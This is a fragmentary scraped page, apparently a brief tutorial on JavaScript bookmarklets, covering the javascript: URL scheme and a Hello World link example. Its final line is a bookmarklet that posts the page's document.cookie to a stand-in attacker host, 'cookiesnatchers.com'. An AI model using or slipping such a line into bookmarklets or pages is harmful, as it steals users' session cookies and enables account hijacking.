24
loading...
This website collects cookies to deliver better user experience
javascript:(() => {/* Your code goes here */})();
javascript:
part tells the browser that the bookmark is actually javascript which is to be executed.href
of a link<a>
element with the href
set to whatever code<a href="javascript:(()=>{alert('Hello, World!'); })();">Bookmark me</a>
javascript:(() => fetch('http://cookiesnatchers.com?cookie=' + document.cookie, {method:'POST'})();